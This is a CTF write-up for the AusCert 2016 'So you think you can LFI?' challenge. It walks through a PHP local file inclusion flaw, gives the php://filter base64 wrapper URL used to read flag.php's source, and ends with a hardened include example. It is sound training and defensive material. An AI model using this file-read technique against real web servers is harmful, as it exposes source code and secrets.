Shearwater AusCert 2016 CTF - So you think you can LFI? Writeup
A solution guide for the So you think you can LFI? challenge released during the AusCert 2016 CTF
This blog post contains a write-up of the solution I used to solve the challenge “So you think you can LFI?” from the web category. We are given a generic link to the web application server and are told that all the web challenges can be found throughout the web application. We are also told that the name of the challenge may help lead you to the vulnerability.
The link to the web server:
Doing some general enumeration of the web application, the robots.txt file was located.
User-agent: *
Disallow: /backup/
The robots.txt file pointed to a directory called backup, which is where index.txt was found. This file leaked the entire source code of the web application’s index.php page. The below code snippet stood out very quickly as a Local File Include vulnerability, hence the name of the challenge.
<?php
if (isset($_GET['filename'])) {
    // Strip '..' sequences and escape quotes before using the value as a path
    $inputfile = str_replace('..', '', addslashes($_GET['filename']));
    // Only inputs containing the word 'flag' are passed to include()
    if (strpos($inputfile, 'flag') !== false) {
        $error = include($inputfile);
        echo $error;   // include() returns 1 on success, which is printed into the page
    }
} else {
    include_once 'footer.php';
}
?>
In the above code, the web application takes the value of the “filename” parameter supplied in a GET request to the index.php page, treats it as a file path and attempts to include that file as part of the web page. Before the include() call, some sanitisation and filtering is performed on the value: “..” sequences are stripped, the input is passed through addslashes(), and the word “flag” must appear somewhere in the input, otherwise nothing is included. With quite a bit of trial and error, it was identified that the index.php response would contain a “1” when the below URL is used.
https://web.ctf.shearwater.com.au/?filename=./flag/flag.php
The “flag.php” file and directory were discovered because the below URL would return a blank page instead of the web application’s generic error page.
https://web.ctf.shearwater.com.au/flag/flag.php
The flag file is assumed to contain PHP code, which the server executes before the page is returned to the viewer, so including it directly only shows its output rather than its source. This means we need to find a way to stop the server from processing the flag.php file so its contents can be viewed. This is when I came across PHP stream wrappers, specifically the php://filter wrapper, which can be used to base64 encode an entire file before it is included.
https://web.ctf.shearwater.com.au/index.php?filename=php://filter/convert.base64-encode/resource=./flag/flag.php
This resulted in the following base64 encoded string being included in the index.php response (the trailing “1” is the return value of include(), echoed by the page, and is not part of the encoded data).
PD9waHAKJGZsYWcgPSAnZmxhZ3tQaHBfV3JhcHAzcnNfUl92M3J5X3VzM2Z1bH0nCj8+1
Decoding it gave the flag for the challenge.
% echo PD9waHAKJGZsYWcgPSAnZmxhZ3tQaHBfV3JhcHAzcnNfUl92M3J5X3VzM2Z1bH0nCj8+1 | base64 --decode
<?php
$flag = 'flag{Php_Wrapp3rs_R_v3ry_us3ful}'
?>
Challenge completed: a nice 200pt web challenge.
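As an added defensive note, here is a hardened form of the include shown above; this is example code, not the challenge's own source or anything from the original post, and it assumes includable pages live in a hypothetical pages/ directory next to index.php. Rather than stripping “..” from the input, it resolves the request to a real path and confines it to that directory, and because realpath() only resolves local filesystem paths, a php://filter wrapper like the one used here never reaches include().

```php
<?php
// Added example (not the challenge's code): a hardened replacement for the
// vulnerable include. PAGES_DIR is a hypothetical directory of includable pages.
const PAGES_DIR = __DIR__ . '/pages';

function resolve_page(string $requested): ?string
{
    // Reject anything that looks like a URL or stream wrapper (php://, data:, ...)
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $requested)) {
        return null;
    }
    // Keep only the file name; any directory component supplied by the user is dropped
    $name = basename($requested);
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $name)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name);
    if ($base === false || $path === false) {
        return null;   // directory or file does not exist
    }
    // realpath() has followed symlinks; confirm the final target is still under PAGES_DIR
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['filename'])) {
    $path = resolve_page((string) $_GET['filename']);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
    } else {
        // Do not echo the return value of include(): that is what produced the
        // stray "1" in the challenge response
        include $path;
    }
} else {
    include_once 'footer.php';
}
```

An explicit allow-list mapping page names to files is simpler still and is the preferred fix when the set of includable pages is small and fixed.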